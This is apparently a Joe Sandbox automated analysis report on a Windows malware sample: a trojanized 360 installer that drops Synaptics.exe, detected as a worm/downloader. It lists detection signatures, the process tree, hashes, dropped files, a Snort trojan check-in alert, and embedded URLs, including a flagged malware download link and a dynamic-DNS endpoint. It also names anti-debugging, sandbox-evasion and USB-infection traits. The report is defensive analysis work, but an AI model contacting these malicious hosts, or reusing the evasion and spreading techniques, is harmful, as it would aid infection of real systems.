Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A1FsbRkm5m.rl

Overview

General Information

Sample Name:A1FsbRkm5m.rl (renamed file extension from rl to exe)
Analysis ID:628251
MD5:6a23eb71a9d38bb41d260439e66b9089
SHA1:8fb7e071f7176a17dafadf82be9fd8f69a327729
SHA256:b634a8041412c63c42bbc10264b4c70b6a84d8aeb01a7d75d89731bb551835ac
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Machine Learning detection for sample
Drops PE files to the document folder of the user
Uses dynamic DNS services
Contains functionality to infect the boot sector
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Launches processes in debugging mode, may be used to hinder debugging
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May infect USB drives
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Queries disk information (often used to detect virtual machines)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to query network adapater information
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • A1FsbRkm5m.exe (PID: 6392 cmdline: "C:\Users\user\Desktop\A1FsbRkm5m.exe" MD5: 6A23EB71A9D38BB41D260439E66B9089)
    • ._cache_A1FsbRkm5m.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe" MD5: F135AB78927AA00AC4A6CAEDD23E2B7F)
    • Synaptics.exe (PID: 6508 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 589E0853896F9B8A51BAD44FD736043E)
      • WerFault.exe (PID: 5272 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 10424 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 4740 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 10424 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • EXCEL.EXE (PID: 6576 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • Synaptics.exe (PID: 7020 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 589E0853896F9B8A51BAD44FD736043E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
A1FsbRkm5m.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\Synaptics\RCX4F28.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\Documents\EIVQSAOTAQ\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        C:\ProgramData\Synaptics\Synaptics.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000002.00000000.280600847.0000000000401000.00000020.00000001.01000000.00000005.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000002.00000000.404477075.0000000000401000.00000020.00000001.01000000.00000005.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  00000005.00000000.308161796.0000000000401000.00000020.00000001.01000000.00000005.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    Click to see the 3 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    2.0.Synaptics.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      2.2.Synaptics.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        2.0.Synaptics.exe.400000.2.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                          2.0.Synaptics.exe.400000.1.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                            5.2.Synaptics.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                              Click to see the 3 entries

                              Sigma Signatures

                              No Sigma rule has matched

                              Snort Signatures

                              Timestamp:192.168.2.369.42.215.25249735802832617 05/17/22-13:31:29.115843
                              SID:2832617
                              Source Port:49735
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus detection for URL or domain
                              Source: http://xred.site50.net/syn/SSLLibrary.dllAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\RCX4F28.tmpAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                              Source: C:\ProgramData\Synaptics\RCX4F28.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\Documents\EIVQSAOTAQ\~$cache1Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                              Source: C:\Users\user\Documents\EIVQSAOTAQ\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Multi AV Scanner detection for submitted file
                              Source: A1FsbRkm5m.exeReversingLabs: Detection: 87%
                              Antivirus / Scanner detection for submitted sample
                              Source: A1FsbRkm5m.exeAvira: detected
                              Source: A1FsbRkm5m.exeAvira: detected
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCX4F28.tmpReversingLabs: Detection: 89%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 87%
                              Source: C:\Users\user\Documents\EIVQSAOTAQ\~$cache1ReversingLabs: Detection: 89%
                              Machine Learning detection for sample
                              Source: A1FsbRkm5m.exeJoe Sandbox ML: detected
                              Machine Learning detection for dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Documents\EIVQSAOTAQ\~$cache1Joe Sandbox ML: detected
                              Source: 5.0.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                              Source: 5.0.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                              Source: 5.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                              Source: 5.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                              Source: 2.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                              Source: 2.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                              Source: 2.0.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                              Source: 2.0.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                              Source: 0.0.A1FsbRkm5m.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                              Source: 0.0.A1FsbRkm5m.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                              Source: 2.0.Synaptics.exe.400000.1.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                              Source: 2.0.Synaptics.exe.400000.1.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                              Source: 0.2.A1FsbRkm5m.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                              Source: 0.2.A1FsbRkm5m.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                              Source: 0.0.A1FsbRkm5m.exe.4b8e14.1.unpackAvira: Label: TR/Patched.Ren.Gen
                              Source: 2.0.Synaptics.exe.400000.2.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                              Source: 2.0.Synaptics.exe.400000.2.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                              Source: 0.2.A1FsbRkm5m.exe.4b8e14.1.unpackAvira: Label: TR/Patched.Ren.Gen
                              Source: A1FsbRkm5m.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49732 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49733 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49741 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49880 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49922 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49981 version: TLS 1.2
                              Source: Binary string: C:\vmagent_new\bin\joblist\524876\out\Release\360Installer.pdb source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.dr
                              Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545731022.0000000067C25000.00000002.00000001.01000000.00000009.sdmp
                              Source: Binary string: C:\vmagent_new\bin\joblist\524876\out\Release\360Installer.pdb source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.dr
                              Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545731022.0000000067C25000.00000002.00000001.01000000.00000009.sdmp
                              Source: A1FsbRkm5m.exeBinary or memory string: autorun.inf
                              Source: A1FsbRkm5m.exeBinary or memory string: [autorun]
                              Source: A1FsbRkm5m.exe, 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: A1FsbRkm5m.exe, 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: A1FsbRkm5m.exe, 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exeBinary or memory string: autorun.inf
                              Source: Synaptics.exeBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000002.00000003.295383743.0000000000825000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000002.00000003.295383743.0000000000825000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000002.00000003.295383743.0000000000825000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exeBinary or memory string: autorun.inf
                              Source: Synaptics.exeBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000005.00000000.308161796.0000000000401000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000005.00000000.308161796.0000000000401000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000005.00000000.308161796.0000000000401000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: autorun.inf
                              Source: A1FsbRkm5m.exeBinary or memory string: [autorun]
                              Source: A1FsbRkm5m.exeBinary or memory string: [autorun]
                              Source: A1FsbRkm5m.exeBinary or memory string: autorun.inf
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CED4D5 _memset,GetLogicalDriveStringsW,GetDriveTypeW,_wcslen,1_2_00CED4D5
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_004099E0
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00406018
                              Source: C:\Users\user\Desktop\A1FsbRkm5m.exeCode function: 0_2_00409B1C FindFirstFileA,GetLastError,0_2_00409B1C
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CEC3CD CharUpperW,_memset,FindFirstFileW,FindNextFileW,FindClose,1_2_00CEC3CD
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CE31FB PathFileExistsW,_wcslen,PathIsDirectoryW,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00CE31FB
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CDCF38 FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,1_2_00CDCF38
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,2_2_004099E0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00409B1C FindFirstFileA,GetLastError,2_2_00409B1C
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00406018
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,5_2_00406018
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,5_2_004099E0
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 5_2_00409B1C FindFirstFileA,GetLastError,5_2_00409B1C

                              Networking

                              barindex
                              Snort IDS alert for network traffic
                              Source: TrafficSnort IDS: 2832617 ETPRO TROJAN W32.Bloat-A Checkin 192.168.2.3:49735 -> 69.42.215.252:80
                              Uses dynamic DNS services
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: global trafficUDP traffic: 192.168.2.3:21389 -> 1.192.136.170:3478
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://%s/%s.trt
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://%s/%u%u.html
                              Source: ._cache_A1FsbRkm5m.exeString found in binary or memory: http://%s/gf/360ini.cab
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://123.com/
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://360.cn
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://agd.p.360.cn
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://agd.p.360.cn360s
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                              Source: Synaptics.exe, 00000002.00000002.500649438.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.407916229.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377175932.0000000005824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl.globalsign.net/root.crl0
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                              Source: ._cache_A1FsbRkm5m.exeString found in binary or memory: http://dl.360safe.com/gf/360ini.cab
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://down.360safe.com/h11=
                              Source: ._cache_A1FsbRkm5m.exeString found in binary or memory: http://down.360safe.com/safesetup_2000.exe
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://down.360safe.com/safesetup_2000.exe360
                              Source: ._cache_A1FsbRkm5m.exeString found in binary or memory: http://down.360safe.com/setup.exe
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exe.exe
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exePathSOFTWARE
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000000.273826170.0000000000D5D000.00000008.00000001.01000000.00000004.sdmpString found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exepr
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exeprLprL
                              Source: ._cache_A1FsbRkm5m.exeString found in binary or memory: http://down.360safe.com/setupbeta.exe
                              Source: ._cache_A1FsbRkm5m.exeString found in binary or memory: http://down.360safe.com/setupbeta.exe4
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://down.360safe.com/setupbeta.exe4(u7b4N
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://down.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                              Source: Synaptics.exe.0.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://hao.360.com
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://ocsp.digicert.com0L
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://ocsp.digicert.com0N
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545965514.0000000067ECF000.00000002.00000001.01000000.00000008.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293013146.0000000003B18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://p.s.360.cn/p2p/p2sp_uplog.php0cpsign1md5b3deb21a3401d8e933ddcb45a6c07222
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://pinst.360.cn/360haohua/safe_chaoqiang.cab?
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128#
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540644885.0000000003FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128.c
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=502411280
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540425527.0000000003B76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=502411281E
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=502411283
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540239401.0000000003A10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=502411286
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128D
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540644885.0000000003FD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128EE
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.540674350.0000000003FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/safe_home_new.cab?rd=50241128R
